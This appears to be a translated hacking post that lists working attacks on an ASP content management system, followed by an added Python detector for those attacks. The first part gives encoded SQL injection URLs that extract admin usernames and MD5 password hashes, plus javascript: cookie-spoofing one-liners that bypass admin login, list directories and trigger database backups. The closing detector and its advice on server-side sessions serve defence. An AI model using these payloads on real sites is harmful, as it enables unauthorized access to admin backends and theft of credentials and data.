1. Injection

1) news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

2) Step 1: javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
Step 2: request: admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
This yields the username and the MD5-hashed password.

2. Cookie spoofing

1) Go straight into the admin backend. Works on older versions; in general, versions where login.asp and admin_index.asp sit in the same directory have this hole.
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"

2) Directory listing.
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."

3) Database backup (seems to work on rather few versions).
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"

4) Getting into the backend when the MD5 hash you obtained cannot be cracked (put the username and the MD5 hash in place of the placeholders 用户名 and md5密码):
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
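As an added example (not part of the original post), a small Python detector showing why the percent-encoded keywords above (%41nd, %53elect, %46rom) slip past a filter that inspects the raw query string, and how decoding before matching catches both that injection shape and the 'or'='or' cookie values. The request paths and Cookie header are constructed to mirror the post's shapes, not real traffic.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Decode repeatedly so double-encoded input (%2541nd -> %41nd -> And) is
# normalised too; three rounds covers realistic evasion depth.
def fully_decode(value, rounds=3):
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

# Patterns applied to decoded, whitespace-collapsed values only.
SQL_PATTERN = re.compile(
    r"\b(union\s+(all\s+)?select|and\s+\d+\s*=\s*\d+|from\s+\w+)\b", re.I)
# Matches the 'or'='or' shape from the post and the ' or '1'='1 variant.
AUTH_BYPASS_PATTERN = re.compile(r"'\s*or\s*'[^']*'?\s*=\s*'", re.I)

def query_values(path):
    """Decoded value of every query-string parameter in a request path."""
    return [fully_decode(v) for _, v in
            parse_qsl(urlsplit(path).query, keep_blank_values=True)]

def cookie_values(cookie_header):
    """Decoded values from a 'name=value; name2=value2' Cookie header."""
    return [fully_decode(part.split("=", 1)[1].strip())
            for part in cookie_header.split(";") if "=" in part]

def raw_filter_hit(path):
    """The weak check: keyword search on the still-encoded query string.
    '%53elect' never equals 'select', so the encoded payload passes."""
    return "select" in path.lower()

def findings(path, cookie_header=""):
    """Hardened check: normalise first, then match. Returns labels found."""
    hits = []
    if any(SQL_PATTERN.search(" ".join(v.split())) for v in query_values(path)):
        hits.append("sqli-in-query")
    if any(AUTH_BYPASS_PATTERN.search(v) for v in cookie_values(cookie_header)):
        hits.append("auth-bypass-in-cookie")
    return hits

# Constructed samples (not real logs) mirroring the shapes in the post.
ENCODED_SQLI = "/news_more.asp?lm=2%20%41nd%201=2%20union%20%53elect%201,2,3"
SPOOFED_COOKIE = "adminuser=%27or%27%3D%27or%27; adminpass=%27or%27%3D%27or%27; admindj=1"
BENIGN = "/news_more.asp?lm=2"
```

Run the checks over each parsed access-log request and Cookie header; the real fix for the cookie case is server-side session state rather than trusting adminuser/adminpass/admindj values sent by the client.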